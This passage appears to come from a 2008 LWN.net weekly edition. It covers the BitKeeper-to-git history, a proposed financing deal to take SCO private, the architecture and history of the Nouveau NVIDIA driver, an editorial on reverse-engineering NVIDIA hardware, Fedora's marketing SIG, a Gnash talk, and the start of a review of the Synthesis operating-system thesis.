     requests for summary judgment in the SCO case are dismissed -
     temporarily - by Judge Kimball.  BitKeeper flame wars return, this
     time about the locking-up of history metadata and license-based
     prohibitions on its extraction.


The locking-up of metadata within BitKeeper was a sore point even for
developers who had accepted BitKeeper in general.  Larry McVoy was unsympathetic, though, stating
that he was operating within his rights.  This episode was the beginning of
the end for BitKeeper and the kernel.


 March 3, 2005:
     MandrakeSoft acquires Conectiva.  The European Commission ignores the
     European Parliament's request to restart the software patent directive
     process.

 March 10, 2005: Kernel
     quality concerns lead to the creation of the -stable tree.


Those quality concerns are not gone now, though they have diminished
somewhat.  The -stable tree seemed like an experiment at the time, but it
has proved successful and is still being produced almost three years
later. 


 April 7, 2005: The
     BitKeeper era comes to an abrupt end when the free-beer license for
     the software is terminated by BitMover.  (Unfounded) rumors about a
     merger between UserLinux and Ubuntu circulate.

 April 14, 2005: Linus
     posts the first version of git.  MandrakeSoft becomes Mandriva.


The termination of free-beer BitKeeper was probably inevitable from the
very beginning of its existence; trying to maintain a closed system with
proprietary data formats in the middle of a highly open process was always
a losing proposition.  For some time, many of us had feared that it could
end in a much uglier way than it actually played out.  We, the community,
had danced on some thin ice for a while, but, when it broke, the water was
only ankle-deep.  We got lucky.

As your editor has said before, BitKeeper did us a lot of good by bringing
order to the kernel development process when things had been working very
poorly, and by showing the world what distributed revision control could
do.  It set the stage for what came after.  Git was not the first free
distributed revision control system, but it was the first to be employed on
such a massive scale.  In a real sense, git launched a new era of free
software development.

On that note, this article will end - and, probably, the retrospective
series ends as well.  As events become more recent, the difficulty of putting
them into historical perspective gets greater.  A retrospective covering
the remaining 2+ years risks becoming a repeat of the annual timelines and
adding little of value.  That period is best left for the 20-year
retrospective.  

So, the entire LWN staff would like to say
"thanks!" one last time to our readers, who have treated us so well for the
last ten years.  It has been an incredible ride.

		SCO to continue the fight?


Just as it seemed the SCO saga was drawing to a close, a new player, with
up to $100 million to risk, has come on the scene.  Stephen Norris Capital
Partners (SNCP) has made an offer to take SCO private while providing a
line of credit to allow the company to continue its operations.
If the bankruptcy court
in Delaware agrees to the plan—which is not a foregone
conclusion—SCO and its various legal cases could be with us for a
long time to come.

 SNCP will put up $5 million in cash to essentially purchase between 51
and 85% of SCO; the exact percentage is dependent upon how much of the $95
million credit line is used to pay off Novell and/or IBM.  If there is no
payment, because SCO eventually wins those cases, SNCP will get 51%.  If
the payment is over $30 million, SNCP gets 85%; in between those two, the
percentage of ownership will be pro-rated between the two.  The actual
transaction would issue "Series A Preferred" stock to SNCP (and its
investors), which would be convertible into SCO "New Common Stock"; the
current common stockholders would see their shares "extinguished" and a
trust established for them.  This deal would take SCO private, no longer
publicly traded nor subject to SEC reporting requirements.  

Under the proposed agreement, the credit line has an interest rate of the London Interbank Offered Rate
(LIBOR) plus "1700 basis points"—17% for those without a high-finance background—which currently works out to be around 20%.  This is
clearly not cheap money, but it does provide a rather large war chest for
SCO to continue the fight. The Memorandum of
Understanding (MOU) [PDF] makes it clear that interest payments are part of
what the line of credit is supposed to pay for:

   The purpose of the loan is to provide funds for (i) working capital for
   SCO following its emergence from bankruptcy, (ii) to pay interest when
   due under the Debt Financing, and (iii) to support the prosecution of
   the Reorganized Debtor's Litigation Claims, including providing letters
   of credit or other financial arrangements adequate to support any
   required appellate bonds (in which event the Reorganized SCO shall pay
   the reasonable letter of credit fees and expenses), and to effect
   payment of any final award against the Reorganized Debtor).


SCO's bombastic CEO, Darl McBride, will be required to resign as a
condition of the deal.  The Series A stockholders would be entitled to
elect four of the seven board members, ensuring that they control the
day-to-day direction of the company.  The CEO would hold another seat, as
would an "outside executive with suitable industry expertise."  The
remaining seat would be open to anyone and voted on by the current common
stockholders. 


What do the current stockholders get from this deal?  Not much in
the short term, as the MOU would set up a trust with $2 million (from the
$5 million cash investment) to be distributed amongst the current
stockholders.  The current common stock would be "extinguished" and the
trust would hold "New Common Stock" equivalent to the 15-49% left over
based on the amount of the credit line used.  Shareholders would get a
pro-rata interest in the trust based on their current percentage of
ownership.  Based on 22 million outstanding shares, the distribution will
amount to around $0.09 per share.
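
The arithmetic behind these numbers can be sketched in a few lines of Python.  This is only an illustration: the function names are invented here, and the pro-rating between 51% and 85% is assumed to be linear in the amount paid, which is not spelled out above.

```python
def sncp_stake(payment_musd):
    """Percentage of SCO held by SNCP for a given payoff to Novell/IBM.

    Assumption: the stake is pro-rated linearly between 51% (no payment)
    and 85% ($30 million or more); the text only says "pro-rated".
    """
    low, high, cap = 51.0, 85.0, 30.0
    fraction = min(max(payment_musd, 0.0), cap) / cap
    return low + (high - low) * fraction


def trust_stake(payment_musd):
    """Percentage left for the trust set up for the current stockholders."""
    return 100.0 - sncp_stake(payment_musd)


def cash_per_share(trust_cash=2_000_000, shares=22_000_000):
    """Cash distribution per existing share from the $2 million trust."""
    return trust_cash / shares


if __name__ == "__main__":
    for payment in (0, 15, 30):
        print(payment, sncp_stake(payment), trust_stake(payment))
    print(round(cash_per_share(), 2))
```

Under the linear assumption, a $15 million payment would sit halfway between the two endpoints; the per-share figure is simply $2 million divided by 22 million shares.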


Since SCO sued IBM in March 2003, most of the stock speculation has been
based on some kind of monetary settlement from IBM.  Investors in SCO since
that time have essentially been betting on that outcome; the new arrangement
still allows the current stockholders to hold onto their litigation lottery
ticket.  Any settlement money that comes to SCO as a result of the Novell
and IBM cases would be paid to the trust in the percentage of ownership of
the company that it holds (i.e. 15-49%).  At that time, the trust would
also get its percentage of four times the previous year's earnings.  These
would then be distributed to the members of the trust.


It's a fairly complicated deal, and this just covers the high points; the
curious are directed to the MOU itself.  It is a bit premature to proclaim
that SCO is going private or getting $100 million as some in the press
have done.  The bankruptcy court will have its say; Novell may have an objection
or two as well, though, as things currently stand, it would be the likely
beneficiary of some substantial part of the line of credit.  We may get a
read on how confident Novell is based on what, if any, objections it raises.


It is hard to imagine that SNCP thinks SCO's business prospects are such
that a large financial commitment is warranted.  This is very clearly an
attempt to wring money out of the current litigation—and perhaps
start additional lawsuits.  It is interesting to note that in addition to
the Novell and IBM lawsuits, the MOU specifically mentions the Autozone
case.  There is speculation that the idea of a "Linux tax" on users is an
outcome that SNCP and its investors covet.


The question is, does SNCP truly believe that the claims made by
SCO (without much in the way of supporting evidence so far) are
likely to succeed on their merits?  Or do they think that providing
enough incentive, in the form of a further protracted legal
battle, might cause someone to settle?  The IBM case has been dragging
on for almost five years now. With the kind of money SCO would have at its
disposal if this deal goes through, dragging it out for another five does not seem implausible.  At some point IBM or Novell may tire of
the whole thing and try to cut some kind of deal.  One hopes not, but that
may be exactly what SNCP is betting on.  The other side of that coin is
that if that doesn't happen, we may well get a real hearing on some of
IBM's counterclaims, in particular the GPL-infringement claims.
That could 
be very interesting to watch. 


		The state of Nouveau, part I


[Editor's note: the following is the first in a two-part article on the
status of the Nouveau project.  This installment is an introductory piece
describing the problem; the second part (to appear in one week) looks at
how Nouveau development is being done and its current status.]


Nouveau is an effort to
create a complete open source driver for NVidia 
graphics cards for X.org.  It aims to support 2D and 3D acceleration from
the early NV04 cards up to the latest G80 cards, and to work across all
supported architectures, such as x86, x86-64, and PPC.
The project originated when Stéphane Marchesin set out to de-obfuscate parts
of the NVidia-maintained nv driver.  However, NVidia had corporate policies
in place about the nv driver, and had no plans to change them at the
time. So they refused Stéphane's patches.

This left Stéphane with the greatest open source choice:
"fork it"! At FOSDEM in February 2006, Stéphane unveiled his plans for an
open source driver for NVidia hardware called Nouveau. The name was
suggested by his IRC client's French autoreplace feature which suggested
the word "nouveau" when he typed "nv". People liked it, so the name
stuck. The FOSDEM presentation got the project enough publicity to engage
the curiosity of other developers.

Ben Skeggs was one of the first developers to sign up.  He had worked on reverse
engineering the R300 (one of ATI's graphics chips) shader components and
writing parts of the R300 driver; as a result, he had considerable experience with graphics
drivers. He initially showed interest in the NV40 shaders only, but he got
caught in the event horizon and has worked on every aspect of the driver
for NV40 and later cards.

The project attracted other developers with short- and long-term interests. It
also generated a large amount of interest due to a pledge drive that an
independent user started.

However, the project was mainly developed on IRC and it was quite difficult
for newcomers to get any insight into previous development; reading
IRC logs is impractical at best.  With this in mind, KoalaBR decided to
start summarizing development in a series of articles known as the TiNDC
(The irregular Nouveau Development Companion). This series of articles
proved very useful for attracting developers and testers to the
project. TiNDC issues are published every two to four weeks; as of this
writing, the current issue is TiNDC
#34. 

Linux.conf.au 2007 saw the first live demo of Nouveau. Dave Airlie had signed up to
give a talk on the subject; he managed to persuade Ben Skeggs that showing a
working glxgears demo would be a great finish to the talk. Ben toiled furiously
with the other developers to get the init code into shape for his laptop
card and the presentation was a great success.

After Nouveau missed out on a Google Summer of Code place, X.org granted the
project a Vacation of Code alternative. This saw Arthur Huillet join the team to
complete proper Xv support on Nouveau. Arthur saw the light and continued
with the project once the VoC ended.
In autumn 2007, Stuart Bennett and Maarten Maathuis vowed to get Nouveau's
RandR 1.2 support into better shape.  Since then, a steady stream of patches has
advanced the code greatly.

The project now has 8 regular contributors (Stéphane Marchesin, Ben Skeggs,
Patrice Mandin, Arthur Huillet, Pekka Paalanen, Maarten Maathuis, Peter
Winters, Jeremy Kolb, Stuart Bennett) with many more part-time
contributors, testers, writers and translators.

NVidia card families

This article will use the NVidia GPU technical names as opposed to marketing names. 


Where both "N" and "G" names exist, the "N" variant (NV4x, NV5x) will be used.
Further information can be found on the Nouveau site.

Graphic Stack Overview

Before jumping into the Nouveau driver, this section provides a short
background on the mess that is the Linux graphics stack.
This stack has a long history dating back to Unix X
servers and the XFree86 project.  This history has led to a situation quite unlike
the driver situation for any other device on a Linux system. The graphics
drivers existed mainly in user space, provided by the XFree86 project, and
little or no kernel interaction was required. The user-space component known
as the DDX (Device-Dependent X) was responsible for initializing the card,
setting modes and providing acceleration for 2D operations.

The kernel also provided framebuffer drivers on certain systems to allow a
usable console before X started.  The interaction between these drivers
and the X.org drivers was very complex and often caused many problems
regarding which driver "owned" the hardware.

The DRI project was started to add support for direct rendering of 3D
applications on Linux. This meant that an application could talk to the 3D
hardware directly, bypassing the X server. OpenGL was the standard 3D API, but
it is a complex interface which is definitely too large to
implement in-kernel. GPUs also provided completely different low-level
interfaces. So, due to the complexity of the higher level interface and
nonstandard nature of the hardware APIs, a kernel component (DRM) and a
userspace driver (DRI) were required to securely expose the hardware interfaces
and provide the OpenGL API.

Shortcomings of the current architecture have been noted over the past few
years; the current belief is that GPU initialization, memory management,
and mode setting need to migrate to the kernel in order to provide better
support for features such as suspend/resume, proper cohabitation of the X and
framebuffer drivers, kernel error reporting, and future graphics card
technologies.

The GPU memory manager implemented by Tungsten Graphics is known as TTM.  It was designed as a
general VM memory manager, but was initially targeted at Intel hardware.
On top of this memory manager, a new modesetting architecture for the
kernel is being implemented.  This is based on the RandR 1.2 work found in
the X.org server.

GPU architecture

Graphics cards are programmed in numerous ways, but most initialization and
mode setting is done via memory-mapped IO. This is just a set of registers
accessible to the CPU via its standard memory address space. The registers
in this address space are split up into ranges dealing with various
features of the graphics card such as mode setup, output control, or clock
configuration.
A longer explanation can be found on Wikipedia.

Most recent GPUs also provide some sort of command processing ability where
tasks can be offloaded from the CPU to be executed on the GPU, reducing the
amount of CPU time required to execute graphical operations.  This
interface is commonly a FIFO implemented as a circular ring buffer into which
commands are pushed by the CPU for processing by the GPU.  It is
located somewhere in a shared memory area (AGP memory, PCIGART, or video
RAM). The GPU will also have a set of state information that is used to
process these commands, usually known as a context.
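
As a rough illustration of the idea, and not of any actual NVidia interface, a command FIFO can be modeled as a fixed-size ring with a "put" index advanced by the CPU and a "get" index advanced by the GPU.  The class and method names below are invented for this sketch.

```python
class CommandRing:
    """Toy model of a command FIFO kept in a circular buffer.

    The CPU writes at `put`; the GPU reads at `get`.  One slot is left
    unused so that put == get always means "empty".
    """

    def __init__(self, size):
        self.buf = [0] * size
        self.size = size
        self.put = 0   # next slot the CPU will write
        self.get = 0   # next slot the GPU will read

    def free_slots(self):
        """Number of words the CPU can still queue."""
        return (self.get - self.put - 1) % self.size

    def push(self, word):
        """CPU side: queue one 32-bit word, failing if the ring is full."""
        if self.free_slots() == 0:
            raise BufferError("ring full; wait for the GPU to catch up")
        self.buf[self.put] = word & 0xFFFFFFFF
        self.put = (self.put + 1) % self.size

    def pop(self):
        """GPU side: fetch the next word, or None if nothing is pending."""
        if self.get == self.put:
            return None
        word = self.buf[self.get]
        self.get = (self.get + 1) % self.size
        return word
```

Both indices wrap around at the end of the buffer, which is what makes the ring "circular"; a real driver would wait for the GPU to drain the ring rather than raise an error.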

Most modern GPUs only contain a single command processing state
machine. However, NVidia hardware has always contained multiple independent
"channels" which consist of a private FIFO (push buffer), a graphics
context and a number of context objects. The push buffer contains the
commands to be processed by the card.  The graphics context stores
application specific data such as matrices, texture unit configuration,
blending setup, shader information, etc. Each channel has 8 subchannels to
which graphics objects are bound in order to be addressed by FIFO
commands.

Each NVidia card provides between 16 and 128 channels, depending on model;
these are assigned to different rendering-related tasks. Each 3D client has
an associated channel, while some are reserved for use in the kernel and
the X
server. Channels are context-switched by software via an interrupt (on older
cards) or automatically by the hardware on cards after the NV30.

So what gets stored in the FIFO?  Each NVidia card offers a set of
objects, each of which provides a set of methods related to a given task,
e.g. DMA memory transfers or rendering.  Those methods are the ones used by
the driver (or on a higher level, the rendering application).  Whenever a
client connects, it uses an ioctl() to create the channel. After that the
client creates the objects it needs via an additional ioctl().

Currently, there are two types of possible clients: X (via the DDX driver)
and OpenGL (via DRI/Mesa). An accelerated framebuffer using the new
mode setting architecture (nouveaufb) will also be a future client to avoid
conflicts with nvidiafb.

Let's have a look at a small number of objects:


From this list, you can see that there are object types which are
available on all cards (NV_MEMORY_TO_MEMORY_FORMAT) while others are only
available on certain cards. For example, each class of card has its own
3D-engine object, such as NV10TCL on NV1x and NV20TCL on NV2x.  An object
is identified by a unique number: its "class". This id is 0x5f for
NV_IMAGE_BLIT, 0x9f for NV12_IMAGE_BLIT and 0x39 for
NV_MEMORY_TO_MEMORY_FORMAT.  If you want to use functionality provided by a
given object, you must first bind this object to a subchannel. The card
provides a certain number of subchannels which correspond to a certain
number of "active" (or "bound") objects.

A command in the FIFO is made of a command header, followed by one or more
parameters.  The command header usually contains the subchannel number, the
method offset to be called, and the number of parameters (a command header
can also define a jump in the FIFO but this is outside the scope of this
document). Each method the object provides has an offset which has to be set in the
command.

In order to limit the number of command headers to be written, thereby
improving performance, NVidia cards will call several subsequent methods in
a row if you provide several parameters.
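
A small Python sketch may make the header format more concrete.  The bit layout used here (parameter count starting at bit 18, subchannel in bits 13-15, method offset in the low 13 bits) and the 4-byte spacing between consecutive methods are assumptions made for illustration, as are the function names and the method offset 0x300; none of them is specified in the text above.

```python
def make_header(subchannel, method, count):
    """Pack a command header word (assumed layout, see the text above)."""
    if not 0 <= subchannel < 8:
        raise ValueError("a channel has 8 subchannels")
    return (count << 18) | (subchannel << 13) | method


def expand(header, params):
    """List the (subchannel, method offset, value) calls one command makes.

    Assumes consecutive methods sit 4 bytes apart, so that N parameters
    after a single header reach N subsequent methods.
    """
    count = (header >> 18) & 0x7FF
    subchannel = (header >> 13) & 0x7
    method = header & 0x1FFC
    if count != len(params):
        raise ValueError("header announces %d parameters" % count)
    return [(subchannel, method + 4 * i, value)
            for i, value in enumerate(params)]


if __name__ == "__main__":
    # Hypothetical method offset 0x300 on subchannel 2, three parameters.
    header = make_header(2, 0x300, 3)
    for call in expand(header, [10, 20, 30]):
        print(call)
```

With this scheme, sending three parameters costs four words in the FIFO (one header plus three values) rather than the six that would be needed if every method call carried its own header.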

How do we refer to an object? The data written to the FIFO doesn't hold any
info about that...  Binding an object to a subchannel is done by writing
the object ID as an argument to method number 0. For example: 00044000
5c00000c binds object id 5c00000c to subchannel 2. This object ID is used
as a key in a hash table kept in the card's memory which is filled up when
creating objects.
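
The example above can be decoded with a few lines of Python.  The bit layout is an assumption (parameter count starting at bit 18, subchannel in bits 13-15, method offset in the low 13 bits), though it does agree with the subchannel given for the example header; the function names are invented, and a plain dictionary stands in for the hash table in the card's memory, whose real hash function is not described here.

```python
def decode_header(word):
    """Split a header into (parameter count, subchannel, method offset)."""
    return (word >> 18) & 0x7FF, (word >> 13) & 0x7, word & 0x1FFC


def bind_objects(words, object_table):
    """Walk (header, parameter) pairs and track method-0 bindings.

    `object_table` maps object IDs to objects; it is a stand-in for the
    hash table which is filled in when objects are created.
    """
    bound = {}
    for header, handle in zip(words[0::2], words[1::2]):
        count, subchannel, method = decode_header(header)
        if count == 1 and method == 0:
            bound[subchannel] = object_table[handle]
    return bound


if __name__ == "__main__":
    # The two words from the example; the object itself is a placeholder.
    table = {0x5C00000C: "example object"}
    print(decode_header(0x00044000))
    print(bind_objects([0x00044000, 0x5C00000C], table))
```

Decoding 00044000 this way yields one parameter, subchannel 2, and method 0, so the following word is taken as the ID of the object to bind.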

The creation of an object relies on special memory areas.
RAMIN is "instance memory", an area of memory through which the graphics
engines of the card are configured.  A RAMIN area is present on all NVIDIA
chipsets in some form, but it has evolved quite a bit as newer chipsets have
been released.  Basically, RAMIN is what contains the objects. An object is
usually not big (128 bytes in general, up to a few kilobytes in the case of DMA
transfer objects).


There are also a few specific areas in RAMIN that are worth mentioning:


 RAMFC, the FIFO Context Table.  It is a global table that stores the
configuration/state of the FIFO engine for each channel.  It doesn't exist
in the same way on NV5x, where the FIFO has registers that contain pointers to each  
    channel's PFIFO state, rather than a single global table.

 RAMHT, the FIFO hash table.  A global table, used by PFIFO to locate context
objects, except on NV5x, where each channel has its own hash table.


Additional information can be found on the Nv object
types and Honza Havlicek
pages on the Nouveau site.


		Reverse engineering: more than NVIDIA deserves?


Reverse engineering is a longstanding tradition in the free software
community.  It has often been the only way to get hardware to work when the
manufacturer refuses to make documentation available, but there is more to
it than that.  Some of us, certainly, enjoy the challenge of figuring out
how a particular device works.  And our sense of freedom tells us that it
is our right to understand the hardware which we have purchased and
rightfully own.  We, as a group, tend not to respond well to those who tell
us that reverse engineering a product is not the right thing to do.  But,
increasingly, your editor is hearing voices within the community which are
saying just that.


One of the most prominent reverse engineering projects at the moment is Nouveau, which is starting to
have some real success in making NVIDIA graphics adapters work with free
software; see this week's Kernel Page for an article on the state of this
project.  NVIDIA hardware has been a problem for a long time, of course. 
It is said to be nicely designed, and it is certainly present in a
significant percentage of new machines, but NVIDIA has had no interest in
making free drivers (or documentation) available for some years.  So the
only way for owners of this hardware to use it with reasonable performance
under Linux is to use NVIDIA's proprietary kernel module, and that is a
price many of us are not willing to pay.


There are currently about eight developers working to make the Nouveau
driver better.  They have reached a point where their understanding of the
hardware and their reverse engineering tools are quite good; that, in turn,
is enabling fast progress toward the creation of a working driver.  With
this kind of developer attention, the Nouveau driver may reach a stable
state over the course of the next year, at least for some versions of the
hardware.  And that, it seems, should be a good thing.


Except for one little issue.  NVIDIA's competition in this market is
provided mainly by Intel and AMD/ATI.  Intel provides free drivers for its
hardware as a matter of company policy, and AMD has pushed a much more
friendly policy onto ATI since the middle of last year.  So free drivers
for Intel video adapters come with distributions, and the first ATI drivers
are beginning to become available.  


One rather perverse result of this situation is that there are almost no
community developers working on the Intel drivers at all.  The development
and maintenance of those drivers is an expense carried by Intel alone.  One
could argue that the lack of hardware documentation from Intel has made it
hard for other developers to participate; Intel is now beginning to address
that problem by burying the community in comprehensive, Creative
Commons-licensed hardware programming manuals.  It will be interesting to
see how much more community help Intel gets as a result of its
documentation release.


ATI, which has not, to date, provided working, free drivers, is arguably
getting more help from the community and, especially, from distributors who
have an interest in working drivers.  But that company, too, is putting in
resources of its own toward that goal.


NVIDIA, instead, is giving us nothing - and, in return, we are giving it
an eight-person development team dedicated to the production of free
drivers for its hardware.  Once Nouveau is in a working state, Linux users will be able to
buy NVIDIA hardware in the knowledge that it will simply work without
requiring them to download and use binary-only kernel modules.  The result
of that can only be higher sales for NVIDIA.


While talking to developers at linux.conf.au, your editor heard a number of
them say that NVIDIA does not deserve a gift of this magnitude from the
community.  We are now quite close to having free support for video
hardware at all performance levels, supplied by friendly
companies.  Rather than penalize those companies by making a free gift to
their biggest competitor, some say, shouldn't NVIDIA be made to pay for its
behavior by exclusion from our community until it comes around?


There is a point here.  The biggest lever we have when talking with
hardware companies (or any company, for that matter) is money.  Companies
which see themselves as missing out on the Linux market will find a strong
incentive to change their behavior.  So if NVIDIA finds that system
resellers are not using its chipsets for Linux-based systems, it will have
to reconsider its position with regard to free drivers.  


In the past, there was no credible alternative to NVIDIA, so the company
had no real reason to fear that it could lose money as a result of its
uncooperative behavior.  Now there are well-supported alternatives at the
lower end of the market, and the prospect of the same for high-end graphics
as well.  So there will be no need to buy hardware from this particular
vendor, and, since the alternatives will be well supported, every reason to
buy from somebody else.  


Unless NVIDIA's hardware, too, is made to work via a community-supported
driver.  Should this happen, one could well say that we, as a community,
have taken a prize away from companies which have treated us well and
handed it to their competitor (which has not).  Arguably, the community
should not pursue the creation of reverse-engineered drivers in situations
where competing vendors are playing by our rules.  Otherwise, we are
sending a rather conflicted message to both types of companies.  It may
really be true that, in the long run, the Nouveau driver is harmful to our
real interests.


All of this discussion may be moot.  There's no way that any of us could keep
others from reverse-engineering their hardware and writing drivers, even if
we wanted to.  Anybody arguing against the mainline inclusion of a
GPL-licensed driver for popular hardware is likely to end up in a minority
position, to say the least.  So, as a community, we cannot make a
collective decision to stop this kind of development.  But, as individual
developers, we may occasionally want to give a moment's thought to the
question of whether our activities are truly beneficial in the long run.

		Marketing Fedora


It is an exciting time for free software as massive strides forward
have been made in increasing both market share and mind share within
the less technically orientated circles of society. Ubuntu is now
available pre-installed on Dell systems, SUSE on Lenovo systems, the
Xandros-based eeePC has sold millions already and the One Laptop Per
Child project has gone into mass production. Stephen Fry, the popular
British actor, is even pledging his support
in national newspapers. Taking advantage of this momentum and using it
to help extend existing communities is going to be vital for any free
software project, and with this in mind Fedora is seeking to set
itself on solid ground with a revitalised marketing effort which hopes
to both define Fedora's position in the world and find new ways of
growing its user and contributor base.

Recently the first tentative steps have been made along this path with
the revitalising of Fedora's community marketing team.  In Fedora parlance,
it is now an official Special Interest Group (SIG).  Following on from a
session at the recent Fedora Users' and Developers' Conference the SIG
is gaining a lot of momentum, with input from Red Hat's professional
marketing team pouring in. This help is being provided on top of their
Red Hat duties, and so their involvement is exactly the same as that
of any other community members. So far their contributions have
largely been aiding the creation of a long term marketing
plan for Fedora, which will help to provide a more consistent message
across Fedora's many outlets. This means that not only will Fedora's
community Ambassadors be better briefed on what the key promotional
aspects of Fedora are, but they'll have a better understanding of the
best methods to achieve this and more support in terms of marketing
collateral.  The same benefits will also apply to Fedora's online
marketing efforts, including their Developer
Interviews and Release
Overviews.

Creating this plan still depends on overcoming a number of challenges.
Foremost amongst these is understanding exactly what Fedora is, and
what its target audience is. Recently Fedora has gone from being a
simple distribution to the upstream for an increasing number of
projects.  Thanks to its open build tools and custom re-spinning
applications there are a growing number of custom spins, and
other projects such as the Creative Commons LiveContent CDs
and DVDs, as well as offerings from the Fedora Unity Project.  Graphical tools
such as Revisor have made
re-spinning easy.  Other Fedora derivatives, notably Red Hat Enterprise
Linux and the OLPC, don't rely on the custom re-spinning applications, but
do rely on Fedora source code to build their distributions.

To accompany this, and widening Fedora's mission even further, is the newly
launched beta of a service called Fedora
TV. Its goals are to encourage the use and development of free media
formats such as Ogg Vorbis/Theora, PNG and SVG, as well as encouraging
the continued development of the free software tools to create media in
these formats.

This is not to say that Fedora is no longer focused on its core
purpose of providing a distribution which showcases the latest and
greatest free software has to offer. Fedora 9 (Sulphur) Alpha was
released recently and a quick glance at its release
notes shows a lot of interesting new features appearing. Along
with the usual bundle of software updates, including KDE 4 and GNOME
2.21.4, a lot of attention has been given to Anaconda, Fedora's system
installer.  In particular Anaconda now has the ability to resize partitions
as well as create and install the system on encrypted partitions. Also
exciting is the inclusion of FreeIPA, a system
which "... combines the power of the Fedora Directory Server with
FreeRADIUS, MIT Kerberos, NTP and DNS to provide an easy, out of the box
solution" for managing various auditing, identity and policy
processes. If the events following Fedora 8's release are anything to go
by, we can expect to see many of these features appearing in other
distributions during the autumn 2008 and spring 2009 release cycles.

Also a significant challenge for the Fedora Marketing SIG is not just
defining what Fedora is, but persuading people that they want to be a
part of it.  In the short term this means promoting the large amount of
work that Fedora does upstream and making it as easy as possible for people
to get involved by lowering their barriers to entry. In the long term this
means, as Paul Frields, Fedora's new project leader, recently commented,
overcoming the "... decline of volunteerism in the USA overall
..."

Of course, talk and good intentions are wonderful, but without
practical results they are meaningless. To this end the Fedora Marketing
SIG is already beginning to pick up speed.  Concrete, long term plans
are being laid with the aid of Red Hat's professionals; and in the
short term Fedora seems to be cropping up in popular news sites more
often than it has done for quite a while.  Fedora developers are gaining
increased recognition for the work that they put in, which often shows up
in other distributions. With the release of Fedora 9 (Sulphur) Alpha, and
the increased attention that this received in comparison to previous early
development releases, as well as an already impressive set of new features,
the future seems bright.

		Rob Savoye discusses the Gnash project


On February 14, 2008 the
Boulder Linux Users Group
presented a talk by Rob Savoye entitled
Gnash, and the quest for Open Media politics and legalities.
This article aims to cover some of the key points raised by Rob.
The Gnash
home page describes the project:


Gnash is a GNU 
Flash movie player.
Previously, it was only possible to play flash movies with proprietary software. While there are some other free flash players, none support anything beyond SWF v4. Gnash is based on
GameSWF,
and supports many SWF v7 features.


Gnash is cross-platform software.  It currently works on the Linux,
MacOS, Windows and some embedded platforms.  Under Linux, it runs on
the KDE, Gnome and FLTK desktop environments.  Gnash can be run in
standalone mode or as a browser plugin for Mozilla Firefox and
Konqueror.  The software currently runs on small platforms such as
cell phones and PDAs, larger desktop systems and game platforms.
Gnash does not yet run on the 
ROCKbox platform, but that is an interesting idea.
Gnash has been developed with efficiency in mind from the beginning.
One of the main design goals has been to trap all possible errors
and deal with them correctly.


The
Open Media Now! Foundation
has been created as a support base for Gnash:


OMNow is a foundation dedicated to the development, support and empowerment of an open media infrastructure. Upon this infrastructure stand companies and individuals who need free media solutions. Free media solutions save companies money and give them control over product technology. Such solutions support individuals by offering them legal ways to create, distribute and display their creative works. Our foundation opens the media market by actively developing operating system-agnostic and cross-platform solutions.


Gnash development originally started because of a need for an open-source
alternative to proprietary Flash/FLV players.
Red Hat's Bob Young is supporting the Gnash project.  His desire was to
have a legal, but free client that allowed Linux users to view
online video sites like YouTube.

Gnash development has been done using a
clean-room reverse engineering technique.
By agreeing to the license for the Adobe (formerly Shockwave) Flash
player, a developer gives up the right to develop a competing product.
This has limited the input from some "tainted" developers to only
remotely testing the application and reporting bugs.
Rob made a number of comments on the Gnash development process.
Reverse engineering of a proprietary format has been
tricky; it has involved a lot of effort from numerous people.
Developers involved in this type of project require a lot of
personal motivation.
After enough hours staring at hex dumps, one is able to recognize
data structures and read the text represented by hex-encoded ASCII.
Patterns emerge in the hex output; some apparent bugs have even been
found in the data generated by proprietary CODECs.


The Gnash project has wider goals than just providing a free
media player.  The writing of open-source creation tools, servers
and clients is in the planning stages.
One interesting concept is to have Gnash negotiate with a content
server and automatically switch to a free CODEC mid stream.
There are plans to support a broader selection of free video
CODECs.  This is somewhat hampered by the numerous and fuzzy
legal issues around CODECs.


FLV is currently the most common online video format; it tends to
lock users in and has successfully locked in the market.
Gnash hopes to break this lock by equipping Gnash with free CODECs
that offer more features, such as higher quality video and better
bandwidth utilization.
Interestingly, the mobile phone platform, which has a much
quicker design cycle turnaround, may lead the way for open video
formats.  Due to its small memory footprint, Gnash is often the best,
if not the only, option for providing video on phones.


Patent-free CODECs can have a large appeal to content providers.
With proprietary CODECs, it is up to the provider to pay the licensing
fees.  This can often consume most of the profit such an organization
brings in.  Free CODECs will enable a much larger group of content
providers to open up.
The Wikipedia online encyclopedia project has recently started
experimenting with a collaborative video project.


Rob mentioned one interesting side topic that applies to many free
software projects.  There are three stages of project development.
The first is making software that works in a basic way.  This is relatively
easy, and is where many projects get stuck.  The next stage is to
make the software work well.  Some, but not many, free software projects
graduate to this level.  The last stage is to make a product.
This is something that only a few free software projects ever achieve.
A product works well for almost all users and is easy to figure out.
Bugs are rarely encountered.  It can take more effort to move to the
product level than the other stages combined.


Wrapping things up, Rob mentioned that the Gnash project is very much
in need of some assistance from a GUI expert; knowledge of both KDE
and GNOME is desirable.  Interested people should apply.
Also, a new release of Gnash should be out fairly soon.


		KHB: Synthesis: An Efficient Implementation of Fundamental Operating Systems Services


When I was but a wee computer science student at New Mexico Tech, a
graduate student in OS handed me an inch-thick print-out and told me
that if I was really interested in operating systems, I had to read
this.  It was something about a completely lock-free operating system
optimized using run-time code generation, written from scratch in
assembly running on a homemade two-CPU SMP with a two-word
compare-and-swap instruction - you know, nothing fancy.  The print-out
I was holding was Alexia (formerly Henry) Massalin's PhD thesis, Synthesis: An
Efficient Implementation of Fundamental Operating Systems Services
(html version
here).  Dutifully, I read the entire 158 pages.  At the end, I
realized that I understood not a word of it, right up to and including
the cartoon of a koala saying "QUA!" at the end.  Okay, I exaggerate -
lock-free algorithms had been a hobby of mine for the previous few
months - but the main point I came away with was that there was a lot
of cool stuff in operating systems that I had yet to learn.


Every year or two after that, I'd pick up my now bedraggled copy of
"Synthesis" and reread it, and every time I would understand a little
bit more.  First came the lock-free algorithms, then the run-time code
generation, then quajects.  The individual techniques were not always
new in and of themselves, but in Synthesis they were developed,
elaborated, and implemented throughout a fully functioning UNIX-style
operating system.  I still don't understand all of Synthesis, but I
understand enough now to realize that my grad student friend was
right: anyone really interested in operating systems should read this
thesis.

Run-time code generation

The name "Synthesis" comes from run-time code generation - code
synthesis - used to optimize and re-optimize kernel routines in
response to changing conditions.  The concept of optimizing code
during run-time is by now familiar to many programmers in part from
Transmeta's processor-level code optimization, used to lower power
consumption (and many programmers are familiar with Transmeta as the
one-time employer of Linus Torvalds).


Run-time code generation in Synthesis begins with some level of
compile-time optimization, optimizations that will be efficient
regardless of the run-time environment.  The result can be thought of as a
